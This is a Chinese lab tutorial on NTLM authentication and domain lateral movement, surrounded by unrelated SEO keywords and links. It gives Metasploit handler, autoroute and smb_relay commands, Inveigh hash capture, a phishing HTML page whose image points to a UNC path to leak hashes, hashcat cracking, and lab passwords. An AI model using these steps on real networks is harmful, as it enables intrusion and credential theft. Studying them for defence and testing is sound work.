当前位置: 首页 > news >正文

个人网站课程设计报告网页设计教程详细步骤ppt

个人网站课程设计报告,网页设计教程详细步骤ppt,seo综合优化公司,电信备案网站打不开目录 NTLM认证过程以及攻击面 NTLM Relay攻击 NTLM攻击总结 实验环境说明 域横向移动#xff1a;NTLM中继攻击 攻击条件 实战一#xff1a;NTLM中继攻击-CS转发上线MSF 原理示意图 一. CS代理转发 二. MSF架设路由 三. 适用smb_relay模块进行中继攻击 域横向移动…目录 NTLM认证过程以及攻击面 NTLM Relay攻击 NTLM攻击总结 实验环境说明 域横向移动NTLM中继攻击 攻击条件 实战一NTLM中继攻击-CS转发上线MSF 原理示意图 一. CS代理转发 二. MSF架设路由 三. 适用smb_relay模块进行中继攻击 域横向移动Net NTLM Hash劫持破解 一. 监听拦截 二. 触发拦截 三. 破解密钥 补充这种方式不仅可以适用smb协议还可以走其他的 NTLM认证过程以及攻击面 非域中 当客户端需要访问服务器时客户端需要输入服务器的用户名和密码进行验证并且客户端会将服务器的NTLM-Hash值缓存。之后客户端开始向服务器发送 TYPE 1 Negotiate 协商消息。服务器收到客户端发送来的 TYPE 1 协商消息后会取出其中自己能够接受的内容传入NTLM SSP得到 TYPE 2 挑战消息此 TYPE 2消息中包含了一个由服务端生成的16位随机值被称为 Challenge。服务器将此challenge保存一份后将TYPE 2消息发送回客户端。客户端收到服务器发来的TYPE 2消息后读出其中的challenge值用缓存的服务端密码的NTLM-Hash对其进行加密并与用户名、challenge等一起组合得到 Net-NTLMHash 最后将 Net-NTLMHash 封装到 TYPE 3 NTLM_AUTH消息中发往服务器。服务器在收到 TYPE 3 的消息之后用自己密码的 NTLM-Hash 对 Challenge 进行加密并比较自己计算出的 Net NTLM-Hash 认证消息和客户端发送的认证消息是否匹配。如果匹配则证明客户端掌握了正确的密码认证成功否则认证失败。 域中在第4步有所不同如果是在域环境中那么认证过程会经过域控制器 当客户端需要访问服务器时客户端需要输入服务器的用户名和密码进行验证并且客户端会将服务器的NTLM-Hash值缓存。之后客户端开始向服务器发送 TYPE 1 Negotiate 协商消息。服务器收到客户端发送来的 TYPE 1 协商消息后会取出其中自己能够接受的内容传入NTLM SSP得到 TYPE 2 挑战消息此 TYPE 2消息中包含了一个由服务端生成的16位随机值被称为 Challenge。服务器将此challenge保存一份后将TYPE 2消息发送回客户端。客户端收到服务器发来的TYPE 2消息后读出其中的challenge值用缓存的服务端密码的NTLM-Hash对其进行加密并与用户名、challenge等一起组合得到 Net-NTLMHash 最后将 Net-NTLMHash 封装到 TYPE 3 NTLM_AUTH消息中发往服务器。服务器接收到客户端发送来的 TYPE 3 消息后取出其中的Net NTLM-Hash值并向域控制器发送针对客户端的验证请求。该请求的内容包含用户名、原始的 Challenge 和 加密后的Challenge(也就是Net NTLM-Hash)。DC根据用户名取出该帐号的密码哈希值 NTLM-Hash用密码哈希值 NTLM-Hash 对原始的Challenge进行加密得到Net NTLM-Hash。如果加密后的Challenge和服务器发送的一致则意味着用户拥有正确的密码验证通过否则验证失败。DC将验证结果发给服务器。 针对NTLM Hash的攻击PTH信息收集针对Net NTLM Hash的攻击暴力破解明文密码利用Net-NTLM Hash中继攻击 Pass The Hash哈希传递攻击通过抓取主机上的Hash传递他们进行攻击不需要明文密码。 利用NTLM进行信息收集通过CS命令就可以达到目的没有意义。 Net-NTLM Hash破解暴力破解得到明文密码 NTLM Relay利用Net-NTLM Hash进行中继攻击 PTH的攻击条件需要NTLM-Hash而后两种则是通过Net-NTLM Hash进行攻击的 如果计算机的修改过注册表打过补丁都有可能造成明文密码Hash提取不到。我们可以尝试获得Net NTLM Hash进行攻击利用。 NTLM Relay攻击 这种攻击方式可以应用在获取不到明文或HASH时采用的手法但也要注意手法的必备条件。 Relay攻击要涉及到NTLM认证和Net-NTLM Hash NTLM HashNTLM hash 就是里面加密保存了用户密码的 hash。Windows 中的用户密码被系统加密后保存在 SAM 文件中如果是域环境则保存在域控的 NTDS.dit 中。 Net NTLM HashNet-NTLM Hash 是基于用户密码的NTLM Hash计算出来的用于在网络环境下 NTLM 认证的 hash。客户端在请求服务时需要的NTLM Hash是服务端密码Net NTLM Hash的生成需要服务端密码的NTLM Hash和challenge用户名得到的。 NTLM攻击总结 有NTLM Hash直接PTH没有NTLM Hash尝试抓取Net NTLM Hash暴力破解明文密码中继攻击。 实验环境说明 DC192.168.3.21       本地管理员administrator Admin12345 域账户god/administrator Admin12345 SQLserver192.168.3.32 本地管理员administrator admin!#45 域账户god/dbadmin admin!#45 Mary-PC192.168.3.25 本地管理员administrator admin!#45 域账户god/mary admin!#45 webserver192.168.3.31    192.168.46.128出网 本地管理员administrator admin!#45 域账户god/webadmin admin!#45 Kali架设MSF 192.168.46.166 46网段是出网的3网段是内网。 域横向移动NTLM中继攻击 一句换概括拿已控制主机的本地管理员的NTLM Hash进行赌狗行为碰撞别的主机进行登录。 一般不会拿域账户的NTLM Hash因为没有意义权限太低。 攻击条件 在内网一台计算机上执行下面这条命令会发生什么事情此时该主机是管理员登录 dir \\192.168.3.21\c$ dir \\192.168.3.32\c$ 这时通过SMB协议访问对方主机的C盘这是一个访问对方主机服务的过程是需要NTLM验证的这里这台主机实际上并没有192.168.3.21的NTLM Hash或者密码的在内存中会加载已有的NTLM Hash也就是自己的(该命令会默认拿自己的)用这一套NTLM Hash去做NTLM认证。 一般来说是会失败的但是这里却成功了。访问192.168.3.32失败下面的却成功了。 也就是说该计算机的NTLM Hash和192.168.3.32主机的NTLM Hash是一样的。 这个Net NTLM Hash中继攻击本质就是利用自己计算机的NTLM Hash或者说账号密码进行碰撞因为这台机器虽然我们拿到了权限但是NTLM Hash窃取不到尝试通过这种赌博行为攻击其它主机。 在实验环境中用webserver这台主机的管理员账号密码是可以配置所有主机并成功的。 实战一NTLM中继攻击-CS转发上线MSF 首先是获得了一台主机webserver的权限 原理示意图 CS做权限移交利用MSF进行渗透CS上每次功能 MSF做一个转发工作配置转发对象 攻击原理用已经拿下权限的主机利用administrator权限去比对任意域内主机比对成功就可以访问登录对方主机就可以直接上线MSF拿到对象的administrator权限 一. CS代理转发 转发到内网的一台Kali上上面架设有MSF实际环境也可转发外网。 配置监听器CS流量转发MSF 192.168.46.166出网2222端口 转发这个监听器 spawn l-msf二. MSF架设路由 MSF监听上线 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 0.0.0.0 set lport 2222 run添加路由 run autoroute -p //查看当前路由表 run post/multi/manage/autoroute //添加当前路由表 backgroup //返回MSF可以攻击到内网3网段 三. 适用smb_relay模块进行中继攻击 设置攻击目标为192.168.3.32 重发模块 use exploit/windows/smb/smb_relay set smbhost 192.168.3.32 //转发攻击目标 set lhost 192.168.46.166 //设置本地IP set autorunscript post/windows/manage/migrate建立正向连接 set payload windows/meterpreter/bind_tcp set rhost 192.168.3.32 //设置连接目标 run这里是一个system权限我们需要的administrator权限降权 CS降权 查看进程 记录下pid通过system进行令牌窃取权限降为administrator MSF降权 get uid ps 在CS上执行命令 shell dir \\192.168.46.166\c$ 这条命令会被MSF中继模块再次进行转发相当于是192.168.3.31对192.168.3.32发起请求 dir \\192.168.3.32\c$ 也可以在MSF上执行Meterpreter上输出shell,弹出192.168.3.31的cmd 攻击成功192.168.3.32上线MSF 192.168.3.32上线MSF因为采用的是正向连接也就是192.168.3.31正向连接192.168.3.32 上线 域横向移动Net NTLM Hash劫持破解 条件被控主机当前管理员权限 因为下面是利用工具所以需要足够的运行权限 项目地址https://github.com/Kevin-Robertson/Inveigh 这里是诱导域内主机访问我们这台已经拿下权限的主机192.168.3.31对方会把自己的Hash发给我们直接拦截下来Net NTLM Hash被捕捉只要是访问192.168.3.31就会被拿下Hash这Hash可能是域控的本地管理员的域用户的 一. 监听拦截 上传程序到对方主机或者挂代理不推荐程序本身就不大避免数据丢失 工具放在192.168.3.31被控主机上执行 Inveigh.exe获取到的是NET NTLM HASH V1或V2 二. 触发拦截 令别的主机dir webserver这里是拿域控的主机进行演示 dir \\192.168.3.31\c$拦截到Hash  会保存在当前目录 这个一般是要配合钓鱼和前面的Exchange服务利用进行结合 !DOCTYPE html html headtitle/title /head bodyimg srcfile:///\\192.168.3.32\2 /body /html三. 破解密钥 破解域控的Hash得到域控的明文密码 hashcat -m 5600 hash pass.txt --show得到域控用户的Hash明文 Admin12345 补充这种方式不仅可以适用smb协议还可以走其他的
http://www.dnsts.com.cn/news/189375.html

相关文章:

  • 北京网站设计案例百度竞价广告推广
  • 网站优化关键词价格58同城推广
  • 保定市住房保障和城乡建设局网站六安网站开发
  • 网站收缩引擎入口琼山网站制作
  • 建设银行网站介绍wordpress 如何安装
  • 网站建设公司哪好电商系统平台开发
  • 个人备案网站做app常州做网上废品收购网站
  • 做电商网站有什么用开发一个大型网站需要多少钱
  • 网站上线流程图打开网页就是2345网址导航
  • 长沙市住房和城乡建设局网站网站推广的技巧和方法
  • 家装设计风格seo网站设计就业前景
  • 做携程怎样的网站淘宝店铺怎么运营
  • 网站开发项目教程星河东莞网站建设
  • wordpress网站备份恢复桥西区网站建设
  • 转发文章赚钱的网站建设摄影比赛投稿网站
  • 绍兴酒店网站建设建小公司网站
  • 做网站公司济南怎么做网站结构拓扑图
  • 南京淄博网站建设方案鲜花商城网站设计
  • 免费软件下载官方网站南阳网站改版
  • 做百度快照要先有网站吗一键建站免费
  • 建设网站需要哪些硬件设施腾讯云备案网站建设方案书
  • 河南公司网站制作咨询网站文字大小代码
  • 杭州网站排名优化工具什么文案容易上热门
  • 高端网站建设设计公司有哪些长春建设
  • 网站显示系统建设中网站建设支出账务处理
  • wordpress加统计代码新的seo网站优化排名 网站
  • 网站制作和美工桂林东西巷介绍
  • 做变形字的网站建设网站申请空间需要多少钱
  • 学网站建设难网站每年都要续费吗
  • 怎么做网站推广知乎修改wordpress默认的登陆地址